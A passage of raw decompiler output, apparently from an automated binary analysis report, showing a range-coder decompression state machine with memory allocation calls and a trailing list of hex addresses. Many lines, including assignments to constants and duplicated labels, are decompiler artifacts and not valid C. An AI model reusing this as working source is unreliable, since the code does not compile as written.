													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L79;
											case 0x1b:
												L75:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t274 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t274;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t283 = __ebp - 0x64;
												 *_t283 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t283;
												 *( *(__ebp - 0x68)) = __cl;
												L79:
												 *(__ebp - 0x14) = __edx;
												goto L80;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L80:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t544 = _t543 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}














                  0x00000000
                  0x004062eb
                  0x004062eb
                  0x004062ef
                  0x00406310
                  0x00406317
                  0x0040631d
                  0x00406323
                  0x00406335
                  0x0040633b
